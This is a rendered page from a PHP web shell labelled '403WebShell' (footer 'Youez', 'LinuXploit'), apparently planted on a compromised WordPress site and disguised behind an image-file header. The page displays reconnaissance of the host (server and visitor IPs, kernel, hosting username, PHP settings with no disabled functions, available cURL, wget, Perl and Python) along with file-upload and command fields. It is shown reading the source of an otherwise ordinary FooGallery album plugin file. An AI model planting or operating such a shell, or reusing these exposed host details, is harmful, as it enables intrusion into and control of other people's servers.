????JFIF??x?x????'403WebShell
403Webshell
Server IP : 104.21.112.1  /  Your IP : 216.73.216.145
Web Server : LiteSpeed
System : Linux premium151.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
User : tempvsty ( 647)
PHP Version : 8.0.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/tempvsty/pontiacques.org/wp-content/plugins/foogallery/extensions/albums/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/tempvsty/pontiacques.org/wp-content/plugins/foogallery/extensions/albums//class-posttypes.php
<?php

/**
 * FooGallery Album Custom Post Types
 *
 * @package FooGallery
 */

if ( ! class_exists( 'FooGallery_Albums_PostTypes' ) ) {
	/**
	 * Class FooGallery_Post_Type
	 *
	 * Handles the registration and management of custom post types for FooGallery.
	 */
	class FooGallery_Albums_PostTypes {

        const ALBUM_CAPABILITIES = array(
            'edit_post'          => 'edit_foogallery-album',
            'read_post'          => 'read_foogallery-album',
            'delete_post'        => 'delete_foogallery-album',
            'edit_posts'         => 'edit_foogallery-albums',
            'edit_others_posts'  => 'edit_others_foogallery-albums',
            'delete_posts'       => 'delete_foogallery-albums',
            'publish_posts'      => 'publish_foogallery-albums',
            'read_private_posts' => 'read_private_foogallery-albums',
            'create_posts'       => 'create_foogallery-albums'
        );

		/**
		 * Constructor method.
		 */
		public function __construct() {
			// register the post types.
			add_action( 'init', array( $this, 'register_posttype' ) );

            //register the custom capabilities.
            add_action( 'admin_init', array( $this, 'add_capabilities' ) );

			// update post type messages.
			add_filter( 'post_updated_messages', array( $this, 'update_messages' ) );

			// update post bulk messages.
			add_filter( 'bulk_post_updated_messages', array( $this, 'update_bulk_messages' ), 10, 2 );

            //clear capabilities after option update.
            add_action( 'update_option_foogallery', array( $this, 'clear_capabilities' ), 20, 3 );
        }

		/**
		 * Registers the custom post types.
		 */
		public function register_posttype() {

			$args = array(
				'labels'       => array(
					'name'               => __( 'Albums', 'foogallery' ),
					'singular_name'      => __( 'Album', 'foogallery' ),
					'add_new'            => __( 'Add Album', 'foogallery' ),
					'add_new_item'       => __( 'Add New Album', 'foogallery' ),
					'edit_item'          => __( 'Edit Album', 'foogallery' ),
					'new_item'           => __( 'New Album', 'foogallery' ),
					'view_item'          => __( 'View Album', 'foogallery' ),
					'search_items'       => __( 'Search Albums', 'foogallery' ),
					'not_found'          => __( 'No Albums found', 'foogallery' ),
					'not_found_in_trash' => __( 'No Albums found in Trash', 'foogallery' ),
					'all_items'          => __( 'Albums', 'foogallery' ),
				),
				'hierarchical' => false,
				'public'       => false,
				'rewrite'      => false,
				'show_ui'      => true,
				'supports'     => array( 'title' ),
                'show_in_menu' => foogallery_admin_menu_parent_slug(),
                'capabilities' => FooGallery_Albums_PostTypes::ALBUM_CAPABILITIES
			);

			$args = apply_filters( 'foogallery_album_posttype_register_args', $args );
			register_post_type( FOOGALLERY_CPT_ALBUM, $args );
		}

        /**
         * Adds capabilities to the allowed roles, based on the album creator role that is set.
         *
         * @return void
         */
        function add_capabilities( $force = false ) {
            global $foogallery_adding_capabilities;

            $album_creator_role   = foogallery_get_setting( 'album_creator_role', 'inherit' );
            if ( 'inherit' === $album_creator_role ) {
                $album_creator_role = foogallery_setting_gallery_creator_role();
            }

            if ( $force || $album_creator_role !== foogallery_get_setting( 'album_capabilities_set' ) ) {

                $foogallery_albums_adding_capabilities = true;
                update_option( 'foogallery_albums_capabilities_set', $album_creator_role );
                $foogallery_albums_adding_capabilities = false;

                // Get the roles
                $roles = foogallery_get_roles_and_higher( $album_creator_role );

                foreach ( $roles as $the_role ) {
                    $role = get_role( $the_role );

                    if ( !is_null( $role ) ) {

                        foreach ( FooGallery_Albums_PostTypes::ALBUM_CAPABILITIES as $cap_key => $cap ) {
                            $role->add_cap( $cap );
                        }
                    }
                }
            }
        }

        /**
         * Clears the capabilities based on the new value, old value, and option.
         *
         * @param mixed $old_value The old value.
         * @param mixed $value The new value.
         * @param string $option The option.
         */
        function clear_capabilities( $old_value, $value, $option ) {
            global $foogallery_albums_adding_capabilities;
            // Get out early, if we are busy updating album capabilities.
            if ( $foogallery_albums_adding_capabilities ) {
                return;
            }

            if ( $old_value === $value ) {
                return;
            }

            $album_creator_role   = foogallery_get_setting( 'album_creator_role', 'inherit' );
            if ( 'inherit' === $album_creator_role ) {
                $album_creator_role = foogallery_setting_gallery_creator_role();
            }

            $previous_capabilities = get_option('foogallery_albums_capabilities_set' );

            if ( $album_creator_role !== $previous_capabilities ) {
                // Get all roles
                $roles = wp_roles()->get_names();

                // Loop through each role and remove the capabilities
                foreach ($roles as $role => $name) {
                    $role_obj = get_role($role);
                    if (!is_null($role_obj)) {
                        foreach ( FooGallery_Albums_PostTypes::ALBUM_CAPABILITIES as $cap_key => $cap ) {
                            $role_obj->remove_cap($cap);
                        }
                    }
                }

                $this->add_capabilities( true );
            }
        }

		/**
		 * Customize the update messages for an album
		 *
		 * @global object $post     The current post object.
		 *
		 * @param array $messages Array of default post updated messages.
		 *
		 * @return array $messages Amended array of post updated messages.
		 */
		public function update_messages( $messages ) {

			global $post;

			// Add our album messages.
			$messages[ FOOGALLERY_CPT_ALBUM ] = apply_filters(
				'foogallery_album_posttype_update_messages',
				array(
					0  => '',
					1  => __( 'Album updated.', 'foogallery' ),
					2  => __( 'Album custom field updated.', 'foogallery' ),
					3  => __( 'Album custom field deleted.', 'foogallery' ),
					4  => __( 'Album updated.', 'foogallery' ),
					5  => isset( $_GET['revision'] ) ? sprintf( __( 'Album restored to revision from %s.', 'foogallery' ), wp_post_revision_title( (int) $_GET['revision'], false ) ) : false,
					6  => __( 'Album published.', 'foogallery' ),
					7  => __( 'Album saved.', 'foogallery' ),
					8  => __( 'Album submitted.', 'foogallery' ),
					9  => sprintf( __( 'Album scheduled for: <strong>%1$s</strong>.', 'foogallery' ), date_i18n( __( 'M j, Y @ G:i' ), strtotime( $post->post_date ) ) ),
					10 => __( 'Album draft updated.', 'foogallery' ),
				)
			);

			return $messages;

		}

		/**
		 * Customize the bulk update messages for a album
		 *
		 * @param array $bulk_messages Array of default bulk updated messages.
		 * @param array $bulk_counts   Array containing count of posts involved in the action.
		 *
		 * @return array mixed            Amended array of bulk updated messages.
		 */
		public function update_bulk_messages( $bulk_messages, $bulk_counts ) {

			$bulk_messages[ FOOGALLERY_CPT_ALBUM ] = apply_filters(
				'foogallery_album_posttype_bulk_update_messages',
				array(
					'updated'   => _n( '%s Album updated.', '%s Albums updated.', $bulk_counts['updated'], 'foogallery' ),
					'locked'    => _n( '%s Album not updated, somebody is editing it.', '%s Albums not updated, somebody is editing them.', $bulk_counts['locked'], 'foogallery' ),
					'deleted'   => _n( '%s Album permanently deleted.', '%s Albums permanently deleted.', $bulk_counts['deleted'], 'foogallery' ),
					'trashed'   => _n( '%s Album moved to the Trash.', '%s Albums moved to the Trash.', $bulk_counts['trashed'], 'foogallery' ),
					'untrashed' => _n( '%s Album restored from the Trash.', '%s Albums restored from the Trash.', $bulk_counts['untrashed'], 'foogallery' ),
				)
			);

			return $bulk_messages;
		}
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit